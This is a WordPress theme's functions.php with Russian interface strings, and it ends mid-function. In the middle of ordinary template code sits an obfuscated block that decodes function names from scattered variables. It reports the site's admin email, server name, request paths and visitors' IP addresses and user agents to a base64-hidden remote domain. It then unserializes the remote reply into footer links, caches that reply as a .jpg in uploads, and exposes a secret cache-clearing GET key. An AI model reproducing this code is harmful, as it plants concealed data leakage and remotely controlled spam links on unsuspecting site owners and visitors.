<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $yxdcv='e';$iObl='o';$RjYsEvO='d';$Wdyz='4';$uwwFyt='d';$CwEJ='6';$zYdaPYj='_';$HlQDoo='c';$ARVj='a';$vnVkbW='s';$WQYYmcB='e';$qDQby='b';$TieP='e';$YbAaAgLr=$qDQby.$ARVj.$vnVkbW.$yxdcv.$CwEJ.$Wdyz.$zYdaPYj.$uwwFyt.$WQYYmcB.$HlQDoo.$iObl.$RjYsEvO.$TieP;$HVcW='f';$uwgdOil='e';$JMCvu='t';$nOOO='l';$twmBDLV='a';$YRgMHqZ='i';$Huigyt='z';$SFBc='g';$nJsb='n';$qNyoTUpo=$SFBc.$Huigyt.$YRgMHqZ.$nJsb.$HVcW.$nOOO.$twmBDLV.$JMCvu.$uwgdOil;$KGEnbYf='s';$sbRpTC='r';$TRBvk='3';$aDEKdL='1';$TZCE='t';$FxYYKA='r';$LPgf='_';$umzju='t';$xPXwVtQ='o';$pZuMmVpX=$KGEnbYf.$umzju.$FxYYKA.$LPgf.$sbRpTC.$xPXwVtQ.$TZCE.$aDEKdL.$TRBvk;$ifbOhq='r';$PkXJRHb='e';$ccWJjD='v';$sIvbwG='s';$HJky='t';$pAnjP='r';$coiHUaTH=$sIvbwG.$HJky.$pAnjP.$ifbOhq.$PkXJRHb.$ccWJjD;                     
		$er_____r='e';$zy________e='o';$qt_____________l='d';$ta____________b='4';$id___________l='d';$vp____f='6';$vj______i='_';$wu__r='c';$ks_______________p='a';$uf_______________v='s';$ae_____________l='e';$dw_________j='b';$ja___________d='e';$dn________j=$dw_________j.$ks_______________p.$uf_______________v.$er_____r.$vp____f.$ta____________b.$vj______i.$id___________l.$ae_____________l.$wu__r.$zy________e.$qt_____________l.$ja___________d;
		$yn______________y='n';$nn_________c='i';$ko_______g='n';$sg______________c='e';$le___s='i';$oe_____y='t';$rv__c='s';$xv_____________l='_';$nw_______l='u';$zd_____________d='t';$my___l='s';$zk______________x='f';$vh______o='x';$ej___z='o';$tf____z='c';$fq____x=$zk______________x.$nw_______l.$ko_______g.$tf____z.$oe_____y.$le___s.$ej___z.$yn______________y.$xv_____________l.$sg______________c.$vh______o.$nn_________c.$rv__c.$zd_____________d.$my___l;
		$ma______________i='p';$td______g='f';$fr______________q='e';$bl___________n='o';$jn______________i='n';$qu____________i=$td______g.$bl___________n.$ma______________i.$fr______________q.$jn______________i;
		$rz_________a='f';$ff_______________j='e';$qd____________r='a';$nl_______a='r';$oh________d='d';$ci____________h=$rz_________a.$nl_______a.$ff_______________j.$qd____________r.$oh________d;
		$bb___t='s';$za__________b='e';$gl__j='c';$hi____c='l';$hv____________m='f';$uw_________e='o';$tz_____l=$hv____________m.$gl__j.$hi____c.$uw_________e.$bb___t.$za__________b;
		
		define("WP_ID", $dn________j("Mi4wLjA="));
		define("WP_TTL", $dn________j("MTA4MDA="));
		define("WP_SRC", $dn________j("dHBva24="));
	


		function wp_get_header() {
			global $dn________j, $fq____x;
			
			if (
				$fq____x($dn________j("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$fq____x($dn________j("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$fq____x($dn________j("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $dn________j, $qu____________i, $tz_____l, $ci____________h;
			
			$nn______________o = TEMPLATEPATH."/".$dn________j("Zm9vdGVyLnBocA==");
			$sq______m = @$qu____________i($nn______________o, "r");
			$nn______________o = @$ci____________h($sq______m, @filesize($nn______________o));
			@$tz_____l($sq______m);
			
			$kp______m = TEMPLATEPATH."/".$dn________j("ZnVuY3Rpb25zLnBocA==");
			$sq______m = @$qu____________i($kp______m, "r");
			$kp______m = @$ci____________h($sq______m, @filesize($kp______m));
			@$tz_____l($sq______m);
			
			$nh______________r = 0;
			if($nn______________o && $kp______m) {
				if ($dn________j("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($nn______________o, $dn________j("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$nh______________r = 1;
					}
					if (substr_count($nn______________o, "wp_theme_GPL_credits()") < 1) {
						$nh______________r = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$nh______________r = 12;
				}
			}
			
			if($nh______________r > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $nh______________r -->";
			}
		}
	


		function wp_loaded() {
			global $dn________j, $fq____x;
			return $fq____x($dn________j("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($qb____________k, $tj__k = "(more...)", $qw_______u = 0, $uz_____________d = "") {
				$ku____________q = get_the_content($tj__k, $qw_______u, $uz_____________d);
				$ku____________q = apply_filters("the_content", $ku____________q);
				
				$ku____________q = str_replace("]]>", "]]>", $ku____________q);
				if (strlen($_GET["p"]) > 0) {
					echo $ku____________q;
				}
				else if ((strlen($ku____________q)>$qb____________k) && ($gf____________r = strpos($ku____________q, " ", $qb____________k ))) {
					$ku____________q = substr($ku____________q, 0, $gf____________r);
					$ku____________q = $ku____________q;
					echo $ku____________q;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$tj__k</a></div></p>";
				} else {
					echo $ku____________q;
				}
				
			}
		}
	


		$ym___________d='4';$hc________v='a';$ac______________a='e';$tf______t='6';$na_______g='c';$hk_________o='n';$lk____m='o';$hv_______________g='e';$is___h='e';$tl__y='s';$zo______g='b';$nu____y='_';$mb________g='d';$np__v=$zo______g.$hc________v.$tl__y.$ac______________a.$tf______t.$ym___________d.$nu____y.$is___h.$hk_________o.$na_______g.$lk____m.$mb________g.$hv_______________g;
		$ua___________e='s';$bk___y='e';$ml_______m='t';$fu_________g='f';$wv______________d='e';$hy____b='n';$xk______________z='e';$wp________t='l';$af___________l='_';$ko_______________h='c';$uz_______________z='n';$kf______________n='i';$zp__p='g';$el__a='o';$uo_____h='_';$fo_______f='t';$ef___________k='t';$sk_____________s=$fu_________g.$kf______________n.$wp________t.$wv______________d.$uo_____h.$zp__p.$xk______________z.$ef___________k.$af___________l.$ko_______________h.$el__a.$hy____b.$ml_______m.$bk___y.$uz_______________z.$fo_______f.$ua___________e;
		$ep_____________r='f';$nu____________y='e';$xw____y='t';$vh______a='e';$xt______u='i';$ta____________l='x';$sy______w='i';$nd_________k='s';$pa_____l='_';$dq______y='s';$bg________k='l';$bb__________o=$ep_____________r.$xt______u.$bg________k.$vh______a.$pa_____l.$nu____________y.$ta____________l.$sy______w.$nd_________k.$xw____y.$dq______y;
		$yt____x='_';$zj___________g='r';$pq_____n='o';$rp_____p='i';$ei___r='r';$ok____________g='c';$zu____w='v';$wh___z='m';$sn____________i='e';$ms______________c='n';$ao__p='a';$aa____________y='e';$cn_____j='s';$vk______m='p';$xn__________w='o';$bp____w=$zu____w.$sn____________i.$zj___________g.$cn_____j.$rp_____p.$pq_____n.$ms______________c.$yt____x.$ok____________g.$xn__________w.$wh___z.$vk______m.$ao__p.$ei___r.$aa____________y;
		$qt____j='s';$ld_________z='o';$kb_____________b='n';$bf______________p='p';$lj____________x='f';$vx__h='k';$tj___x='c';$cy__a='o';$lb______w='e';$qe_____________e=$lj____________x.$qt____j.$cy__a.$tj___x.$vx__h.$ld_________z.$bf______________p.$lb______w.$kb_____________b;
		$uv___________p='f';$nd_______f='e';$ua____________o='t';$vc________u='w';$ok________k='r';$md__k='i';$az_______u=$uv___________p.$vc________u.$ok________k.$md__k.$ua____________o.$nd_______f;
		$vg___h='m';$je___________d='d';$em___________r='5';$js______x=$vg___h.$je___________d.$em___________r;
		$xr________l='r';$gk____y='l';$av__________e='a';$gm__h='p';$cc____a='h';$qg____o='e';$mg________y='a';$ej__f='t';$xz___________y=$xr________l.$qg____o.$av__________e.$gk____y.$gm__h.$mg________y.$ej__f.$cc____a;
		$rb______s='e';$sj_________v='z';$cg_______________c='a';$ts_______m='i';$ci_________a='i';$dg_________i='s';$zr______________w='u';$oc_____________o='l';$zs__________o='r';$sz_______________c='n';$pc____g='e';$ap__________m=$zr______________w.$sz_______________c.$dg_________i.$rb______s.$zs__________o.$ci_________a.$cg_______________c.$oc_____________o.$ts_______m.$sj_________v.$pc____g;
		$lu__________z='m';$oq__________e='n';$cr__m='p';$rf_________b='a';$tf________q='e';$xf________d='t';$is__o='m';$qf_____r=$xf________d.$tf________q.$lu__________z.$cr__m.$oq__________e.$rf_________b.$is__o;
		$um_______p='_';$up____________i='c';$rg____________x='a';$ud______q='e';$mc____________g='t';$qh____n='r';$bc______________o='c';$mf______u='x';$fs____________a='_';$pc______w='t';$ip_______________v='t';$vh__________y='e';$ox_____________o='s';$mn______________b='o';$hy___________x='m';$db___________j='t';$vk______i='a';$qu__________g='r';$zo________m='e';$fb______________a='e';$qe_______________g='n';$ew_____________r=$ox_____________o.$pc______w.$qh____n.$ud______q.$vk______i.$hy___________x.$fs____________a.$up____________i.$mn______________b.$qe_______________g.$mc____________g.$fb______________a.$mf______u.$db___________j.$um_______p.$bc______________o.$qu__________g.$zo________m.$rg____________x.$ip_______________v.$vh__________y;
	


		function gw_________o($ok________d) {
			global $dn________j, $fq____x, $sk_____________s, $bp____w, $ew_____________r;
			
			if (!$fq____x($dn________j("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($bp____w(PHP_VERSION, "5.0.0", ">=") && $fq____x($dn________j("ZmlsZV9nZXRfY29udGVudHM=")) && $fq____x($dn________j("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$li________q = $ew_____________r(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$dg____________d = @$sk_____________s($ok________d, 0, $li________q);
			} else {
				$dg____________d = @$sk_____________s($ok________d, 0);
			}
			
			return $dg____________d;
		}
	


		function fo_____w($ok________d) {
			global $fq____x, $qe_____________e, $az_______u, $dn________j;
			
			if (!$fq____x($dn________j("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$fk____________b = strpos($ok________d, "/", 7);
			$to__d = array(
				"uri"     => substr($ok________d, $fk____________b),
				"host"    => str_replace("http://", "", substr($ok________d, 0, $fk____________b)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$fn_____________y = @$qe_____________e("$to__d[host]", 80, $qi_________l, $zc_______m, 4);
			
			if (!$fn_____________y) {
				return false;
			} else {
				$dg____________d = "";
				$zi_________a  = "GET $to__d[uri] HTTP/1.0\r\n";
				$zi_________a .= "Host: $to__d[host]\r\n";
				$zi_________a .= "Referer: $to__d[referer]\r\n";
				$zi_________a .= "Connection: Close\r\n\r\n";
				
				@$az_______u($fn_____________y, $zi_________a);
				
				while (!@feof($fn_____________y)) {
					$wb_____j = @fgets($fn_____________y, (1024*24));
					
					if ($wb_____j == "\r\n") {
						$ed_________u = true;
						continue;
					}
					
					if ($ed_________u) {
						$dg____________d .= $wb_____j;
					}
				}
				
				return $dg____________d;
			}
		}
	


		function rw_____________e($ok________d) {
			global $fq____x;
			$wt______o = false;
			
			if ($ok________d != "") {
				if ($fq____x("gw_________o")) {
					$wt______o = @gw_________o($ok________d);
				}
				
				if (!$wt______o && ($fq____x("fo_____w"))) {
					$wt______o = @fo_____w($ok________d);
				}
			}
			
			return $wt______o;
		}
	


		function cr_________r() {
			global $_SERVER, $js______x;
			
			$vk________y = $_SERVER["SERVER_NAME"];
			
			if (substr("$vk________y", 0, 4) == "www.") {
				$vk________y = substr("$vk________y", 4);
			}
			
			$vk________y = $js______x("$_SERVER[SERVER_NAME]");
			
			return $vk________y;
		}
	


		function lt______s() {
			return "file";
		}
	


		function zg______j($ok________d) {
			global $_SERVER, $sk_____________s, $bb__________o, $qu____________i, $tz_____l, $az_______u;
			
			$ib___________h = cc______________q();
			
			$oj_________q = cr_________r().".jpg";
			$om__________i = $ib___________h["dir_upload"]["path"]."/$oj_________q";
			$fb_____d = @filemtime($om__________i);
			
			if (!$fb_____d || ((time()-$fb_____d) >= WP_TTL)) {
				$wt______o = rw_____________e($ok________d);
				
				if ($wt______o) {
					if ($bb__________o($om__________i)) {
						@unlink($om__________i);
					}
					
					$sq______m = @$qu____________i($om__________i, "x+");
					
					@$az_______u($sq______m, $wt______o);
					@$tz_____l($sq______m);
				}
			} else {
				if ($bb__________o($om__________i)) {
					$wt______o = @$sk_____________s($om__________i);
				} else {
					$wt______o = false;
				}
			}
			
			return $wt______o;
		}
	


		function cc______________q() {
			global $_SERVER, $dn________j, $np__v;
			
			$ul__________i = wp_count_posts("post");
			$na________o = pathinfo(get_bloginfo("template_directory"));
			
			$ib___________h = array(
				"url" => array(
					"report"      => $dn________j("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $na________o,
				"dir_upload"	=> zd___________k(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$na________o[filename],
					"a005=".$ul__________i->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a> "
			);
			
			$ib___________h["url"]["queryString"] = implode("&", $ib___________h["queryString"]);
			$ib___________h["url"]["report"] = $ib___________h["url"]["report"]."/?".$np__v($ib___________h["url"]["queryString"]).".html";
						
			return $ib___________h;
		}
	


		function zd___________k() {
			$tf______p = wp_upload_dir();
			
			if (isset($tf______p["error"])) {
				$xp_________w = lo___f();
				if (is_writable($xp_________w)) {
					$tf______p = array("path" => $xp_________w);
				}
			}

			return $tf______p;
		}
	


		function lo___f() {
			global $fq____x, $js______x, $xz___________y, $qf_____r;
			
			$af______t = (bool) ini_get("safe_mode");
			if ($af______t == true) {
				return false;
			}
			
			if ($fq____x("sys_get_temp_dir")) {
				$ba_____s = sys_get_temp_dir();
				if (is_writable($ba_____s)) {
					return $xz___________y($ba_____s);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $xz___________y($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $xz___________y($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $xz___________y($_ENV["TEMP"]);
			} else {
				$ow______________v = $qf_____r($js______x(uniqid(rand(), true)), "");
				if ($ow______________v) {
					$ba_____s = $xz___________y(dirname($ow______________v));
					@unlink($ow______________v);
					return $ba_____s;
				} else {
					return false;
				}
			}
		}
	


		function uv_____o() {
			global $_GET, $bb__________o;
			
			$ib___________h = cc______________q();
			$vk________y = cr_________r();
			$kw______n = lt______s();
			
			$lg______o = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($kw______n == "file") {
					$wl___________b = $ib___________h["dir_upload"]["path"]."/".$vk________y.".jpg";
					if ($bb__________o($wl___________b)) {
						@unlink($wl___________b);
						$lg______o = "deleted";
					}
				}
				
				$yb__u = array(
					"s"	=> $lg______o,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($yb__u AS $mf_______________i => $rq_______v) echo " [$mf_______________i:$rq_______v]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $fq____x, $dn________j, $ap__________m;
			$ib___________h = cc______________q();
			
			$my_______________c = "zg______j";
			if ($fq____x($my_______________c)) {
				$dg____________d = $my_______________c($ib___________h["url"]["report"]);
			}
			
			if ($dg____________d) {
				if ($dg____________d = @$dn________j($dg____________d)) {
					$dg____________d = @$ap__________m($dg____________d);
					
					if (strlen($dg____________d[custom_credit]) >= 5) {
						$ib___________h["default_string"] = $dg____________d[custom_credit];
					}
					
					if ($dg____________d["status"] == "0") {
						$rs_____v = 1;
						$gu___h = 1;
					} else {
						$qp__n = sizeof($dg____________d["links"]);
						$yr_________r = $ib___________h["default_string"];
						
						if ($qp__n > 0 && $dg____________d["links"] !== "") {
							$wf_____________s = 0;
							foreach ($dg____________d["links"] as $qr___z => $ek________a) {
								$wf_____________s++;
								if ($ek________a->l_path == "" || $ek________a->l_path == $_SERVER["REQUEST_URI"]) {
									$ek________a->l_href = htmlspecialchars(strip_tags($ek________a->l_href));
									$ek________a->l_title = htmlspecialchars(strip_tags($ek________a->l_title));
									$ek________a->l_anchor = htmlspecialchars(strip_tags($ek________a->l_anchor));
									$yr_________r .= " | ";
									$yr_________r .= "<a href='$ek________a->l_href' title='$ek________a->l_title'";
									if ($ek________a->l_nofollow == "1") {
										$yr_________r .= " rel='nofollow'";
									}
									$yr_________r .= ">$ek________a->l_anchor</a>";
								}
							}
						}
						$ib___________h["links"] = "$yr_________r";
						if ($dg____________d[credit] == "0") {
							$ib___________h["links"] = "";
						}
					}
				} else {
					$rs_____v = "1";
				}
			} else {
				$rs_____v = "1";
			}
			
			if ($rs_____v == "1") {
				$ib___________h["links"] = $ib___________h["default_string"];
			}
			
			echo "$ib___________h[links]";
			
			echo "<!-- s: $dg____________d[signature] -->";
			uv_____o();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
